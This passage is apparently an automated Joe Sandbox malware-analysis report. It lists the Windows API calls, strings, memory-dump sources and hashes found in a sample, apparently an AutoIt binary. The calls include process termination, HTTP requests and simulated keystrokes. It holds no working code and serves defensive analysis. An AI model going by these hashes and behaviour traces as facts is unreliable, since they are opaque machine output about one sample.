                                                                            • Instruction Fuzzy Hash: E0118131515205FFDB665FB4EC58BE97B7AEB09321F104222FA69950E1CF710961EF10
                                                                            APIs
                                                                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0027ADE1
                                                                            • OleUninitialize.OLE32(?,00000000), ref: 0027AE80
                                                                            • UnregisterHotKey.USER32(?), ref: 0027AFD7
                                                                            • DestroyWindow.USER32(?), ref: 002B2F64
                                                                            • FreeLibrary.KERNEL32(?), ref: 002B2FC9
                                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 002B2FF6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                            • String ID: close all
                                                                            • API String ID: 469580280-3243417748
                                                                            • Opcode ID: bff26c50f27fc8e4e253ebe8875a1edd398974b18cc842cd2fc5f1855c61e96e
                                                                            • Instruction ID: c4e92c4f21b6b8b053ce93582fdb92ffd6cb96493201e563bfc771aafffbbbe3
                                                                            • Opcode Fuzzy Hash: bff26c50f27fc8e4e253ebe8875a1edd398974b18cc842cd2fc5f1855c61e96e
                                                                            • Instruction Fuzzy Hash: 4FA15B34722212CFCB29EF14C495B69F364BF44750F1482ADE90AAB691DB31AD36CF91
                                                                            APIs
                                                                            • EnumChildWindows.USER32(?,002CB13A), ref: 002CB078
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: ChildEnumWindows
                                                                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                            • API String ID: 3555792229-1603158881
                                                                            • Opcode ID: a6ee620d1dfe2654f17481f36b77024338dc7720b430378a309ff8bee6d4c360
                                                                            • Instruction ID: 4f2e6d899071c84966a2d99119256dddfee31aa18672772fabcb102b87c51480
                                                                            • Opcode Fuzzy Hash: a6ee620d1dfe2654f17481f36b77024338dc7720b430378a309ff8bee6d4c360
                                                                            • Instruction Fuzzy Hash: E591A17052051AABCB19EF60C482FEEFB75BF04304F14821DE85AA7191DF3169B9CBA1
                                                                            APIs
                                                                            • SetWindowLongW.USER32(?,000000EB), ref: 0027327E
                                                                              • Part of subcall function 0027218F: GetClientRect.USER32(?,?), ref: 002721B8
                                                                              • Part of subcall function 0027218F: GetWindowRect.USER32(?,?), ref: 002721F9
                                                                              • Part of subcall function 0027218F: ScreenToClient.USER32(?,?), ref: 00272221
                                                                            • GetDC.USER32 ref: 002AD073
                                                                            • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 002AD086
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 002AD094
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 002AD0A9
                                                                            • ReleaseDC.USER32(?,00000000), ref: 002AD0B1
                                                                            • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 002AD13C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                            • String ID: U
                                                                            • API String ID: 4009187628-3372436214
                                                                            • Opcode ID: ec91d2e373d7c325032ace7f13dfb437aeb758237a475af346897af7eb566793
                                                                            • Instruction ID: 3adb0cc6f6661fb9563721362687773290e9c64a45b26314da555697a4e8774d
                                                                            • Opcode Fuzzy Hash: ec91d2e373d7c325032ace7f13dfb437aeb758237a475af346897af7eb566793
                                                                            • Instruction Fuzzy Hash: A971D53042420ADFCF25CF64C885ABA7BB5FF4A360F14426AED5A5A166CB318D61DF60
                                                                            APIs
                                                                              • Part of subcall function 002729E2: GetWindowLongW.USER32(?,000000EB), ref: 002729F3
                                                                              • Part of subcall function 00272714: GetCursorPos.USER32(?), ref: 00272727
                                                                              • Part of subcall function 00272714: ScreenToClient.USER32(003377B0,?), ref: 00272744
                                                                              • Part of subcall function 00272714: GetAsyncKeyState.USER32(00000001), ref: 00272769
                                                                              • Part of subcall function 00272714: GetAsyncKeyState.USER32(00000002), ref: 00272777
                                                                            • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 002FC69C
                                                                            • ImageList_EndDrag.COMCTL32 ref: 002FC6A2
                                                                            • ReleaseCapture.USER32 ref: 002FC6A8
                                                                            • SetWindowTextW.USER32(?,00000000), ref: 002FC752
                                                                            • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 002FC765
                                                                            • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 002FC847
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                            • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                            • API String ID: 1924731296-2107944366
                                                                            • Opcode ID: be49403ec6e7086f75c2364db669025d480fd5b957983c48abe2dc297af6753f
                                                                            • Instruction ID: a3c809cce7de7b52cb3761b8c8860dd80715629a852972c56f57490a77e1e7bd
                                                                            • Opcode Fuzzy Hash: be49403ec6e7086f75c2364db669025d480fd5b957983c48abe2dc297af6753f
                                                                            • Instruction Fuzzy Hash: 3051CF70118309AFD715EF14CC9AFAAB7E9EB84350F10852DF6958B2E1CB30A925CF52
                                                                            APIs
                                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 002E211C
                                                                            • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 002E2148
                                                                            • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 002E218A
                                                                            • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 002E219F
                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002E21AC
                                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 002E21DC
                                                                            • InternetCloseHandle.WININET(00000000), ref: 002E2223
                                                                              • Part of subcall function 002E2B4F: GetLastError.KERNEL32(?,?,002E1EE3,00000000,00000000,00000001), ref: 002E2B64
                                                                              • Part of subcall function 002E2B4F: SetEvent.KERNEL32(?,?,002E1EE3,00000000,00000000,00000001), ref: 002E2B79
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                            • String ID:
                                                                            • API String ID: 2603140658-3916222277
                                                                            • Opcode ID: 848f1eca738771b62e2accdec1ac1816f3c62a039d970fb39a29a9ecc4b96b9c
                                                                            • Instruction ID: f262ef55c5cffc5630c98c1f7dc8eefe51077ca836519178d4a180c371ab7a2d
                                                                            • Opcode Fuzzy Hash: 848f1eca738771b62e2accdec1ac1816f3c62a039d970fb39a29a9ecc4b96b9c
                                                                            • Instruction Fuzzy Hash: 6D41D0B1591249FFEB069F51CC89FBB7BACEF08710F40401AFE069A141D7B49E588BA0
                                                                            APIs
                                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00300980), ref: 002E9412
                                                                            • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00300980), ref: 002E9446
                                                                            • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 002E95C0
                                                                            • SysFreeString.OLEAUT32(?), ref: 002E95EA
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                            • String ID:
                                                                            • API String ID: 560350794-0
                                                                            • Opcode ID: d616b307e377f85d2ce8c36fde0f1b3c3fabf5e724daf199bc5f90854ffdcc6e
                                                                            • Instruction ID: f0dd54a5da08b84510d45a0e861a7f85c9aee7b923e068f3c60d17bd8ff72bdf
                                                                            • Opcode Fuzzy Hash: d616b307e377f85d2ce8c36fde0f1b3c3fabf5e724daf199bc5f90854ffdcc6e
                                                                            • Instruction Fuzzy Hash: EEF13971A20209EFCB14DF95C884EAEB7B9FF49314F50805AF50AAB250DB71AE95CF50
                                                                            APIs
                                                                              • Part of subcall function 002D4BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,002D3B8A,?), ref: 002D4BE0
                                                                              • Part of subcall function 002D4BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,002D3B8A,?), ref: 002D4BF9
                                                                              • Part of subcall function 002D4FEC: GetFileAttributesW.KERNEL32(?,002D3BFE), ref: 002D4FED
                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 002D52FB
                                                                            • _wcscmp.LIBCMT ref: 002D5315
                                                                            • MoveFileW.KERNEL32(?,?), ref: 002D5330
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                            • String ID:
                                                                            • API String ID: 793581249-0
                                                                            • Opcode ID: bde85633c1c77593c4cb2a9fde4a6ff3c3dfacb32e2bbb99ee1ec436d4c5f1ba
                                                                            • Instruction ID: 85a26f0a5194bf0274b2824e8da782f7567afc7dfc361cad3dd06f83372360ad
                                                                            • Opcode Fuzzy Hash: bde85633c1c77593c4cb2a9fde4a6ff3c3dfacb32e2bbb99ee1ec436d4c5f1ba
                                                                            • Instruction Fuzzy Hash: CD5164B20187959BC764EBA0D8819DBB3EC9F84300F50092FF589D3192EF74A699CB56
                                                                            APIs
                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 002F8D24
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: InvalidateRect
                                                                            • String ID:
                                                                            • API String ID: 634782764-0
                                                                            • Opcode ID: c436a920f0708709c534dac6caa8750d742449d288672f46b93378ece9dbe7c3
                                                                            • Instruction ID: 9c2a98feac2efdb28ccdb2d3e61e7ef6e08b4d80de8ffb1cce948da27707f07d
                                                                            • Opcode Fuzzy Hash: c436a920f0708709c534dac6caa8750d742449d288672f46b93378ece9dbe7c3
                                                                            • Instruction Fuzzy Hash: B651913066120DAFEB259F24CC89B79FB65EB05790F144522F715DA1E1CF71A9A08A50
                                                                            APIs
                                                                            • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 002AC638
                                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 002AC65A
                                                                            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 002AC672
                                                                            • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 002AC690
                                                                            • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 002AC6B1
                                                                            • DestroyIcon.USER32(00000000), ref: 002AC6C0
                                                                            • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 002AC6DD
                                                                            • DestroyIcon.USER32(?), ref: 002AC6EC
                                                                              • Part of subcall function 002FAAD4: DeleteObject.GDI32(00000000), ref: 002FAB0D
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                            • String ID:
                                                                            • API String ID: 2819616528-0
                                                                            • Opcode ID: 6941f84ff12e5de3d78804d71daab10e1f873bb6dd71b0f008589e85320df54b
                                                                            • Instruction ID: 374b1bf82d5e82c4b8fb0ed04d19f2c1684e8074df628cfe35855309782999ec
                                                                            • Opcode Fuzzy Hash: 6941f84ff12e5de3d78804d71daab10e1f873bb6dd71b0f008589e85320df54b
                                                                            • Instruction Fuzzy Hash: 1D519C7062020AEFDB24DF24CC95BAA77B9EB44710F208519F946E76A0DB70ECA0DF50
                                                                            APIs
                                                                              • Part of subcall function 002CB52D: GetWindowThreadProcessId.USER32(?,00000000), ref: 002CB54D
                                                                              • Part of subcall function 002CB52D: GetCurrentThreadId.KERNEL32 ref: 002CB554
                                                                              • Part of subcall function 002CB52D: AttachThreadInput.USER32(00000000,?,002CA23B,?,00000001), ref: 002CB55B
                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 002CA246
                                                                            • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 002CA263
                                                                            • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 002CA266
                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 002CA26F
                                                                            • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 002CA28D
                                                                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 002CA290
                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 002CA299
                                                                            • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 002CA2B0
                                                                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 002CA2B3
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                            • String ID:
                                                                            • API String ID: 2014098862-0
                                                                            • Opcode ID: 25946a24662530ef6b39cf524e33c7e37ce3bfb5867d7a830854a995b8509b03
                                                                            • Instruction ID: 5dc78fde8219a27b7de1da90923371de9034540e74196b76b8baba5658dbffa4
                                                                            • Opcode Fuzzy Hash: 25946a24662530ef6b39cf524e33c7e37ce3bfb5867d7a830854a995b8509b03
                                                                            • Instruction Fuzzy Hash: 7211E1B1960218BEF6116F609C8AF6A7B2DEB4C794F50051AF7446B0D0CAF35C609AA1
                                                                            APIs
                                                                            • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,002C915A,00000B00,?,?), ref: 002C94E2
                                                                            • HeapAlloc.KERNEL32(00000000,?,002C915A,00000B00,?,?), ref: 002C94E9
                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,002C915A,00000B00,?,?), ref: 002C94FE
                                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,002C915A,00000B00,?,?), ref: 002C9506
                                                                            • DuplicateHandle.KERNEL32(00000000,?,002C915A,00000B00,?,?), ref: 002C9509
                                                                            • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,002C915A,00000B00,?,?), ref: 002C9519
                                                                            • GetCurrentProcess.KERNEL32(002C915A,00000000,?,002C915A,00000B00,?,?), ref: 002C9521
                                                                            • DuplicateHandle.KERNEL32(00000000,?,002C915A,00000B00,?,?), ref: 002C9524
                                                                            • CreateThread.KERNEL32(00000000,00000000,002C954A,00000000,00000000,00000000), ref: 002C953E
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                            • String ID:
                                                                            • API String ID: 1957940570-0
                                                                            • Opcode ID: a6a427206be89e435c66e72192ed6590d0f5bc706687fb5d23ab238eb32106f9
                                                                            • Instruction ID: a755087e56aab3abdd1c4c3bc445cd34a62dc1587bc1ba3c4ece301c1b405678
                                                                            • Opcode Fuzzy Hash: a6a427206be89e435c66e72192ed6590d0f5bc706687fb5d23ab238eb32106f9
                                                                            • Instruction Fuzzy Hash: 5D01C9B9241308BFE715AFA5DC4DF6B7BACEB89711F408412FA05DB2A1CA709800CB20
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: NULL Pointer assignment$Not an Object type
                                                                            • API String ID: 0-572801152
                                                                            • Opcode ID: 8c314410901c47a7dddf2bbd052b58912e0efc61c0920d36c8030844987a447d
                                                                            • Instruction ID: de066d61fa71891eea6ba3a7a99d4642220e8edf5f7ef358fe36f617ae946b70
                                                                            • Opcode Fuzzy Hash: 8c314410901c47a7dddf2bbd052b58912e0efc61c0920d36c8030844987a447d
                                                                            • Instruction Fuzzy Hash: 21C1B271E5025A9FDF10CF99C884BAEB7F9FF48310F948469E905AB280E770AD54CB51
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$ClearInit$_memset
                                                                            • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                            • API String ID: 2862541840-625585964
                                                                            • Opcode ID: caed4927245c06b934d6b2ac06d736e802eb61a7f1b301d7e13913d7cb63d054
                                                                            • Instruction ID: 9683eed0215859a0eee232b422ca908187237b4a9c31bdf521c3ce9f4019ceee
                                                                            • Opcode Fuzzy Hash: caed4927245c06b934d6b2ac06d736e802eb61a7f1b301d7e13913d7cb63d054
                                                                            • Instruction Fuzzy Hash: 8391B070A6025AAFDF24CFA6C844FAEBBB8EF45710F50851EF515AB241D7709990CFA0
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 002F7449
                                                                            • SendMessageW.USER32(?,00001036,00000000,?), ref: 002F745D
                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 002F7477
                                                                            • _wcscat.LIBCMT ref: 002F74D2
                                                                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 002F74E9
                                                                            • SendMessageW.USER32(?,00001061,?,0000000F), ref: 002F7517
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window_wcscat
                                                                            • String ID: SysListView32
                                                                            • API String ID: 307300125-78025650
                                                                            • Opcode ID: 8e379ad1fe757f6576c1cf549acbcbea72f4f56412e51e9973df14e203584543
                                                                            • Instruction ID: 5183335b9ff41dc3e2d097f6f2fbbc5287f3892b981fa3e99f5ff5e39c7887e9
                                                                            • Opcode Fuzzy Hash: 8e379ad1fe757f6576c1cf549acbcbea72f4f56412e51e9973df14e203584543
                                                                            • Instruction Fuzzy Hash: D541A37091430DAFEB229F64CC85BEEB7B9EF08390F10446AFA85A7191D6719D94CB50
                                                                            APIs
                                                                              • Part of subcall function 002D4148: CreateToolhelp32Snapshot.KERNEL32 ref: 002D416D
                                                                              • Part of subcall function 002D4148: Process32FirstW.KERNEL32(00000000,?), ref: 002D417B
                                                                              • Part of subcall function 002D4148: CloseHandle.KERNEL32(00000000), ref: 002D4245
                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 002EF08D
                                                                            • GetLastError.KERNEL32 ref: 002EF0A0
                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 002EF0CF
                                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 002EF14C
                                                                            • GetLastError.KERNEL32(00000000), ref: 002EF157
                                                                            • CloseHandle.KERNEL32(00000000), ref: 002EF18C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
